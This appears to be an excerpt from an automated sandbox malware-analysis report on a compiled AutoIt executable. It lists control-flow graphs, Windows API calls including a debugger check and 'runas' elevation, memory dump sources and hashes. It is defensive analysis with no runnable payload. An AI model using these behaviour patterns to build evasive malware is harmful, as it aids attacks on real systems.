4bb314-4bb31b 998->1000 1000->993 1002 4bb321-4bb34c WriteFile 1000->1002 1001->993 1002->897 1003 4bb352-4bb359 1002->1003 1003->984 1004 4bb35f-4bb366 1003->1004 1004->993
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 39fb142a464a0c8484becb812a2f2a906167b81d274100207e0d4c97c73eb947
                                                                                                                • Instruction ID: 61528eecffa6bde6a8ba12bd61cdcaa1b1b8745fedcef688e3803d330f73adc1
                                                                                                                • Opcode Fuzzy Hash: 39fb142a464a0c8484becb812a2f2a906167b81d274100207e0d4c97c73eb947
                                                                                                                • Instruction Fuzzy Hash: BC327F75B022288FCB249F15DC416EAB7B5FF46314F0440DAE40AE7A91D7749E81CFA6

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00493AA3,?), ref: 00493D45
                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,00493AA3,?), ref: 00493D57
                                                                                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00551148,00551130,?,?,?,?,00493AA3,?), ref: 00493DC8
                                                                                                                  • Part of subcall function 00496430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00493DEE,00551148,?,?,?,?,?,00493AA3,?), ref: 00496471
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,00493AA3,?), ref: 00493E48
                                                                                                                • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005428F4,00000010), ref: 00501CCE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00551148,?,?,?,?,?,00493AA3,?), ref: 00501D06
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0052DAB4,00551148,?,?,?,?,?,00493AA3,?), ref: 00501D89
                                                                                                                • ShellExecuteW.SHELL32(00000000,?,?,?,?,00493AA3), ref: 00501D90
                                                                                                                  • Part of subcall function 00493E6E: GetSysColorBrush.USER32(0000000F), ref: 00493E79
                                                                                                                  • Part of subcall function 00493E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00493E88
                                                                                                                  • Part of subcall function 00493E6E: LoadIconW.USER32(00000063), ref: 00493E9E
                                                                                                                  • Part of subcall function 00493E6E: LoadIconW.USER32(000000A4), ref: 00493EB0
                                                                                                                  • Part of subcall function 00493E6E: LoadIconW.USER32(000000A2), ref: 00493EC2
                                                                                                                  • Part of subcall function 00493E6E: RegisterClassExW.USER32(?), ref: 00493F30
                                                                                                                  • Part of subcall function 004936B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004936E6
                                                                                                                  • Part of subcall function 004936B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00493707
                                                                                                                  • Part of subcall function 004936B8: ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 0049371B
                                                                                                                  • Part of subcall function 004936B8: ShowWindow.USER32(00000000,?,?,?,?,00493AA3,?), ref: 00493724
                                                                                                                  • Part of subcall function 00494FFC: _memset.LIBCMT ref: 00495022
                                                                                                                  • Part of subcall function 00494FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004950CB
                                                                                                                Strings
                                                                                                                • This is a third-party compiled AutoIt script., xrefs: 00501CC8
                                                                                                                • runas, xrefs: 00501D84
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                • API String ID: 438480954-3287110873
                                                                                                                • Opcode ID: a83a60bcae03dc37941d61d7bc77dd0c50e21ec356a099911546607c4e2841d5
                                                                                                                • Instruction ID: ac1e0efb720603c4d43d4b9bfbab74c2049c47142fde4c18865abf2947b1d0e6
                                                                                                                • Opcode Fuzzy Hash: a83a60bcae03dc37941d61d7bc77dd0c50e21ec356a099911546607c4e2841d5
                                                                                                                • Instruction Fuzzy Hash: 0D513831E04B44AACF01ABB1DC56EEE7F75AB26709F00407BF50162192DA785A0DDB3A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1169 493742-493762 1171 4937c2-4937c4 1169->1171 1172 493764-493767 1169->1172 1171->1172 1173 4937c6 1171->1173 1174 493769-493770 1172->1174 1175 4937c8 1172->1175 1176 4937ab-4937b3 NtdllDefWindowProc_W 1173->1176 1179 49382c-493834 PostQuitMessage 1174->1179 1180 493776-49377b 1174->1180 1177 501e00-501e2e call 492ff6 call 4ae312 1175->1177 1178 4937ce-4937d1 1175->1178 1182 4937b9-4937bf 1176->1182 1212 501e33-501e3a 1177->1212 1183 4937d3-4937d4 1178->1183 1184 4937f6-49381d SetTimer RegisterClipboardFormatW 1178->1184 1181 4937f2-4937f4 1179->1181 1186 501e88-501e9c call 4d4ddd 1180->1186 1187 493781-493783 1180->1187 1181->1182 1189 501da3-501da6 1183->1189 1190 4937da-4937ed KillTimer call 493847 call 49390f 1183->1190 1184->1181 1192 49381f-49382a CreatePopupMenu 1184->1192 1186->1181 1206 501ea2 1186->1206 1193 493789-49378e 1187->1193 1194 493836-493840 call 4aeb83 1187->1194 1199 501da8-501daa 1189->1199 1200 501ddc-501dfb MoveWindow 1189->1200 1190->1181 1192->1181 1195 501e6d-501e74 1193->1195 1196 493794-493799 1193->1196 1207 493845 1194->1207 1195->1176 1211 501e7a-501e83 call 4ca5f3 1195->1211 1204 49379f-4937a5 1196->1204 1205 501e58-501e68 call 4d55bd 1196->1205 1208 501dcb-501dd7 SetFocus 1199->1208 1209 501dac-501daf 1199->1209 1200->1181 1204->1176 1204->1212 1205->1181 1206->1176 1207->1181 1208->1181 1209->1204 1213 501db5-501dc6 call 492ff6 1209->1213 1211->1176 1212->1176 1217 501e40-501e53 call 493847 call 494ffc 1212->1217 1213->1181 1217->1176
                                                                                                                APIs
                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 004937B3
                                                                                                                • KillTimer.USER32(?,00000001), ref: 004937DD
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00493800
                                                                                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0049380B
                                                                                                                • CreatePopupMenu.USER32 ref: 0049381F
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 0049382E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                • String ID: TaskbarCreated
                                                                                                                • API String ID: 157504867-2362178303
                                                                                                                • Opcode ID: 0856f578002871df1f9558016f6992d90e72d849616d58a00821d251ad618ee9
                                                                                                                • Instruction ID: 2e468926076b679826e5b53d644460ff1254db9c7e56c80690b3a90f375815b6
                                                                                                                • Opcode Fuzzy Hash: 0856f578002871df1f9558016f6992d90e72d849616d58a00821d251ad618ee9
                                                                                                                • Instruction Fuzzy Hash: C64104B5100A45A7DF109FA8DC5EBBE3EA5F716303F40817BF901922E0CA689D45A72E

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1237 4addc0-4ade4f call 49d7f7 GetVersionExW call 496a63 call 4adfb4 call 496571 1246 5024c8-5024cb 1237->1246 1247 4ade55-4ade56 1237->1247 1250 5024e4-5024e8 1246->1250 1251 5024cd 1246->1251 1248 4ade58-4ade63 1247->1248 1249 4ade92-4adea2 call 4adf77 1247->1249 1254 4ade69-4ade6b 1248->1254 1255 50244e-502454 1248->1255 1268 4adec7-4adee1 1249->1268 1269 4adea4-4adec1 GetCurrentProcess call 4adf5f 1249->1269 1252 5024d3-5024dc 1250->1252 1253 5024ea-5024f3 1250->1253 1257 5024d0 1251->1257 1252->1250 1253->1257 1260 5024f5-5024f8 1253->1260 1261 502469-502475 1254->1261 1262 4ade71-4ade74 1254->1262 1258 502456-502459 1255->1258 1259 50245e-502464 1255->1259 1257->1252 1258->1249 1259->1249 1260->1252 1264 502477-50247a 1261->1264 1265 50247f-502485 1261->1265 1266 4ade7a-4ade89 1262->1266 1267 502495-502498 1262->1267 1264->1249 1265->1249 1272 4ade8f 1266->1272 1273 50248a-502490 1266->1273 1267->1249 1274 50249e-5024b3 1267->1274 1270 4adee3-4adef7 call 4ae00c 1268->1270 1271 4adf31-4adf3b GetSystemInfo 1268->1271 1269->1268 1288 4adec3 1269->1288 1285 4adf29-4adf2f GetSystemInfo 1270->1285 1286 4adef9-4adf01 call 4adff4 GetNativeSystemInfo 1270->1286 1277 4adf0e-4adf1a 1271->1277 1272->1249 1273->1249 1279 5024b5-5024b8 1274->1279 1280 5024bd-5024c3 1274->1280 1282 4adf1c-4adf1f FreeLibrary 1277->1282 1283 4adf21-4adf26 1277->1283 1279->1249 1280->1249 1282->1283 1287 4adf03-4adf07 1285->1287 1286->1287 1287->1277 1291 4adf09-4adf0c FreeLibrary 1287->1291 1288->1268 1291->1277
                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004ADDEC
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,0052DC38,?,?), ref: 004ADEAC
                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,0052DC38,?,?), ref: 004ADF01
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 004ADF0C
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 004ADF1F
                                                                                                                • GetSystemInfo.KERNEL32(?,0052DC38,?,?), ref: 004ADF29
                                                                                                                • GetSystemInfo.KERNEL32(?,0052DC38,?,?), ref: 004ADF35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 3851250370-0
                                                                                                                • Opcode ID: 66e481213930f7899f645d9ae9b58db9d8d0b5301c7c0da50d5677997026c21a
                                                                                                                • Instruction ID: 8d63c1b0cb30796cc7e99412a8421c18edadc1b82d4bde814e6db9c98ce3b3a3
                                                                                                                • Opcode Fuzzy Hash: 66e481213930f7899f645d9ae9b58db9d8d0b5301c7c0da50d5677997026c21a
                                                                                                                • Instruction Fuzzy Hash: 9A619271C0A284DFCF15CF6894C51EE7FB46F3A300F1985DAD8459F24BD6288909CB6A

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1339 49406b-494083 CreateStreamOnHGlobal 1340 4940a3-4940a6 1339->1340 1341 494085-49409c FindResourceExW 1339->1341 1342 504f16-504f25 LoadResource 1341->1342 1343 4940a2 1341->1343 1342->1343 1344 504f2b-504f39 SizeofResource 1342->1344 1343->1340 1344->1343 1345 504f3f-504f4a LockResource 1344->1345 1345->1343 1346 504f50-504f6e 1345->1346 1346->1343
                                                                                                                APIs
                                                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0049407B
                                                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0049449E,?,?,00000000,00000001), ref: 00494092
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,0049449E,?,?,00000000,00000001,?,?,?,?,?,?,004941FB), ref: 00504F1A
                                                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,0049449E,?,?,00000000,00000001,?,?,?,?,?,?,004941FB), ref: 00504F2F
                                                                                                                • LockResource.KERNEL32(0049449E,?,?,0049449E,?,?,00000000,00000001,?,?,?,?,?,?,004941FB,00000000), ref: 00504F42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                • String ID: SCRIPT
                                                                                                                • API String ID: 3051347437-3967369404
                                                                                                                • Opcode ID: cb6e73603c4c16386981504c91f3e5994cd90b86f261bbc12688e6f45848e14d
                                                                                                                • Instruction ID: 2f48d12bf6fda089b5dcedae40d791b749d2cfcac1d048d377dbf26d6c7101cf
                                                                                                                • Opcode Fuzzy Hash: cb6e73603c4c16386981504c91f3e5994cd90b86f261bbc12688e6f45848e14d
                                                                                                                • Instruction Fuzzy Hash: C0115774200701BFEB218B25ED48F677BB9EBC5B51F20812DF626862A0DBB5DC059A30
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(?,00502F49), ref: 004D6CB9
                                                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 004D6CCA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004D6CDA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 48322524-0
                                                                                                                • Opcode ID: 0ed7a32e838121e29a04f5edbcf46198c5df64b1162880c727ec6c35368556d5
                                                                                                                • Instruction ID: 791f43ede01175e4dcc4e6fe65d9ee95f8027c3d5e14e9e29139bc9d0236df82
                                                                                                                • Opcode Fuzzy Hash: 0ed7a32e838121e29a04f5edbcf46198c5df64b1162880c727ec6c35368556d5
                                                                                                                • Instruction Fuzzy Hash: 33E048318645156782106738EC0D4EA777CDA15339F104717F575C13D0E778D94895EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper
                                                                                                                • String ID:
                                                                                                                • API String ID: 3964851224-0
                                                                                                                • Opcode ID: 0b110584375a20d1f590cbe76f40329eb26f3d9049eeb518585aea54eddd619d
                                                                                                                • Instruction ID: 7f7b8ab2a01f7a4e2cab66343354965abbe8d8238fd4447878d0f37fb6f50199
                                                                                                                • Opcode Fuzzy Hash: 0b110584375a20d1f590cbe76f40329eb26f3d9049eeb518585aea54eddd619d
                                                                                                                • Instruction Fuzzy Hash: 6B92AE706083019FD724DF19C484B6ABBE1BF99308F14885EF88A8B392D779ED45CB56
                                                                                                                APIs
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049E959
                                                                                                                • timeGetTime.WINMM ref: 0049EBFA
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0049ED2E
                                                                                                                • TranslateMessage.USER32(?), ref: 0049ED3F
                                                                                                                • DispatchMessageW.USER32(?), ref: 0049ED4A
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 0049ED79
                                                                                                                • DestroyWindow.USER32 ref: 0049ED85
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0049ED9F
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00505270
                                                                                                                • TranslateMessage.USER32(?), ref: 005059F7
                                                                                                                • DispatchMessageW.USER32(?), ref: 00505A05
                                                                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00505A19
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                • API String ID: 2641332412-570651680
                                                                                                                • Opcode ID: 6d50515db6bb3d1a3148eb0bb6d4ff5bac50066076eb5c655ef637f4ae058f4d
                                                                                                                • Instruction ID: 8060e9f4487b75f289f5d3a3de156554c58aa12b36a0d39bd1503034bf316ded
                                                                                                                • Opcode Fuzzy Hash: 6d50515db6bb3d1a3148eb0bb6d4ff5bac50066076eb5c655ef637f4ae058f4d
                                                                                                                • Instruction Fuzzy Hash: 7F62B070504740DFDB20DF25C895BAB7BE4BF55304F08497EE9868B2D2DB78A848CB56
                                                                                                                APIs
                                                                                                                • ___createFile.LIBCMT ref: 004C5EC3
                                                                                                                • ___createFile.LIBCMT ref: 004C5F04
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004C5F2D
                                                                                                                • __dosmaperr.LIBCMT ref: 004C5F34
                                                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 004C5F47
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004C5F6A
                                                                                                                • __dosmaperr.LIBCMT ref: 004C5F73
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004C5F7C
                                                                                                                • __set_osfhnd.LIBCMT ref: 004C5FAC
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 004C6016
                                                                                                                • __close_nolock.LIBCMT ref: 004C603C
                                                                                                                • __chsize_nolock.LIBCMT ref: 004C606C
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 004C607E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 004C6176
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 004C618B
                                                                                                                • __close_nolock.LIBCMT ref: 004C61EB
                                                                                                                  • Part of subcall function 004BEA9C: CloseHandle.KERNELBASE(00000000,0053EEF4,00000000,?,004C6041,0053EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004BEAEC
                                                                                                                  • Part of subcall function 004BEA9C: GetLastError.KERNEL32(?,004C6041,0053EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004BEAF6
                                                                                                                  • Part of subcall function 004BEA9C: __free_osfhnd.LIBCMT ref: 004BEB03
                                                                                                                  • Part of subcall function 004BEA9C: __dosmaperr.LIBCMT ref: 004BEB25
                                                                                                                  • Part of subcall function 004B7C0E: __getptd_noexit.LIBCMT ref: 004B7C0E
                                                                                                                • __lseeki64_nolock.LIBCMT ref: 004C620D
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004C6342
                                                                                                                • ___createFile.LIBCMT ref: 004C6361
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004C636E
                                                                                                                • __dosmaperr.LIBCMT ref: 004C6375
                                                                                                                • __free_osfhnd.LIBCMT ref: 004C6395
                                                                                                                • __invoke_watson.LIBCMT ref: 004C63C3
                                                                                                                • __wsopen_helper.LIBCMT ref: 004C63DD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3896587723-2766056989
                                                                                                                • Opcode ID: f3758d8e83f86817e60f6577ad1a02f51b6798a626c122a141cbdd163ada9404
                                                                                                                • Instruction ID: cd778c4c516eb0b3e9f872bcd9242bf35459ad04e066a32cbcc765137ba5cdbe
                                                                                                                • Opcode Fuzzy Hash: f3758d8e83f86817e60f6577ad1a02f51b6798a626c122a141cbdd163ada9404
                                                                                                                • Instruction Fuzzy Hash: E02223799006059BEB699F68CC45FEE7B31EB10314F25822EE822A73D1C23D9D80D759
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
